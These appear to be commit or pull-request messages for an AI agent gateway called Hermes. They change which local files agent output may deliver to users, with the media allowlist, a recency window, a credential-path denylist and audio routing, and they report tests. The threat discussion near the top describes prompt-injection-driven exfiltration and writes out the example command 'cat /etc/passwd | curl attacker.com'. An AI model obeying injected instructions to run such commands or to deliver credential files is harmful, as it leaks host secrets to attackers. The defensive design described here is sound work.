PR #29523 restricted MEDIA: paths and bare local paths in agent output to
files under the Hermes media cache or an operator-allowlisted root, with
a 10-minute recency window as a fallback. The intent was to defend
against prompt-injection-driven exfiltration of host secrets, but in the
default single-user setup the asymmetry doesn't earn its keep: we accept
any document type the user uploads inbound (.md, .pdf, .txt, .docx, ...)
and the agent already has terminal access — anything that can convince
it to emit a MEDIA: tag for /etc/passwd can equally convince it to
`cat /etc/passwd | curl attacker.com`.
Practical breakage: agents that produced an .md, .pdf, or other
artifact more than ~10 minutes ago, or outside the cache allowlist,
showed the user a raw filepath in chat instead of the file.
Default flipped to denylist-only:
• /etc, /proc, /sys, /dev, /root, /boot, /var/{log,lib,run}
• $HOME/{.ssh,.aws,.gnupg,.kube,.docker,.config,.azure,.gcloud}
• macOS Library/Keychains
• $HERMES_HOME/{.env, auth.json, credentials}
The legacy allowlist+recency-window behavior stays available via
opt-in: `gateway.strict: true` in config.yaml (or
`HERMES_MEDIA_DELIVERY_STRICT=1`). Recommended for public-facing bots
where prompt injection from one user shouldn't be able to exfiltrate
the host's secrets to that same user.
• `gateway/platforms/base.py` — `validate_media_delivery_path()`
short-circuits to "return resolved if not under denylist" when
strict is off. Strict mode preserves the original cache-then-
allowlist-then-recency logic. New `_media_delivery_strict_mode()`
reader for `HERMES_MEDIA_DELIVERY_STRICT`.
• `hermes_cli/config.py` — `gateway.strict: false` added to
DEFAULT_CONFIG; existing keys documented as "only consulted in
strict mode." No `_config_version` bump needed (deep-merge picks
up the new default for old installs).
• `gateway/run.py` — bridges `gateway.strict` →
`HERMES_MEDIA_DELIVERY_STRICT` at startup.
• `tools/send_message_tool.py` — schema description broadened back
to plain "any local path."
• Tests — existing strict-path tests pinned to STRICT=1 so they keep
exercising the legacy behavior; new `TestMediaDeliveryDefaultMode`
with 8 cases covering the public default (stale .md accepted, any
extension delivers, credential paths still blocked, strict env-var
aliases, filter E2E).
Validation:
- tests/gateway/test_platform_base.py: 119/119 pass
- tests/gateway/test_tts_media_routing.py: 7/7 pass
- tests/tools/test_send_message_tool.py: 121/121 pass
- tests/hermes_cli/test_kanban_notify.py: 12/12 pass
- tests/cron/test_scheduler.py: 120/120 pass
- E2E via execute_code with real imports:
• stale .md outside allowlist → accepted (default)
• same path with STRICT=1 → rejected
• $HOME/.ssh/id_rsa → rejected (default)
• filter_local_delivery_paths([md, key]) → [md] only
• gateway.strict in config.yaml → bridged to env (true=1, false=0)
The gateway's media delivery allowlist required files live inside
`~/.hermes/cache/{documents,images,...}`, which is the wrong shape for
real agent usage. Agents naturally produce artifacts via terminal tools
(`pandoc -o /tmp/report.pdf`, `matplotlib savefig`, etc.) or
write_file into project directories — these never land under the cache.
Result: users got a raw file path in chat instead of an attachment.
This is doubly bad in deployment shapes where the cache directories
aren't writable by the agent at all: Hermes running in Docker with a
read-only mount, or with a Docker/Modal/SSH terminal backend whose
filesystem isn't the gateway host's filesystem.
Layered trust model:
1. Cache-dir allowlist (unchanged) — Hermes-managed roots always trusted.
2. Operator allowlist — `HERMES_MEDIA_ALLOW_DIRS` env var, now also
surfaced as `gateway.media_delivery_allow_dirs` in config.yaml.
3. Recency-based trust (new, default on) — files whose mtime is within
`gateway.trust_recent_files_seconds` (default 600s) of "now" are
trusted even outside the cache/operator allowlist. Old host files
(`/etc/passwd`, `~/.bashrc`, `~/.ssh/id_rsa`) have mtimes measured
in days/months, well outside the window — prompt-injection paths
pointing at pre-existing files are still rejected.
4. Hard denylist — `/etc`, `/proc`, `/sys`, `/dev`, `/root`, `/boot`,
`/var/{log,lib,run}`, plus `$HOME/.{ssh,aws,gnupg,kube,docker,config,
azure,gcloud}` and `Library/Keychains`. Denylist blocks delivery
even when recency would trust the file, in case an attacker
somehow refreshes a sensitive file's mtime.
Operators who want strict-allowlist behavior set
`gateway.trust_recent_files: false` and the system reverts to
pre-existing behavior.
Tests: 6 new cases in test_platform_base.py cover the recency window,
disabled mode, system-path denylist, and the motivating PDF-in-project
scenario. 3 existing tests (test_platform_base, test_tts_media_routing,
test_send_message_tool) that exercised the strict-allowlist path are
updated to disable recency trust explicitly.
E2E validation: real `validate_media_delivery_path()` accepts fresh
PDFs in /tmp and project dirs, rejects /etc/passwd, ~/.ssh/id_rsa, and
files older than the window; config.yaml `gateway.*` keys bridge
correctly to the env vars the validator reads.
Extracted from PR #17211 (@versun) so it can land independently of the
local_command TTS provider redesign.
- Add should_send_media_as_audio(platform, ext, is_voice) in
gateway/platforms/base.py; single source of truth for audio routing.
- Add .flac to recognized audio extensions (MEDIA regex, weixin audio
set, send_message audio set).
- Telegram send_voice() now falls back to send_document for formats
Telegram's Bot API can't play natively (.wav, .flac, ...) instead of
raising; MP3/M4A still go to sendAudio, Opus/OGG still go to sendVoice.
- Route _send_telegram() in send_message_tool through a narrower
_TELEGRAM_SEND_AUDIO_EXTS = {.mp3, .m4a} set.
- cron.scheduler._send_media_via_adapter now delegates the audio
decision to should_send_media_as_audio so it matches the gateway.
- Update the cron live-adapter ogg test to flag [[audio_as_voice]] so
it still routes to sendVoice under the new Telegram-specific policy.
- Tests: unit coverage for should_send_media_as_audio across platforms,
end-to-end MEDIA routing via _process_message_background and
GatewayRunner._deliver_media_from_response, TelegramAdapter.send_voice
fallback for FLAC/WAV.
Co-authored-by: Versun <me+github7604@versun.org>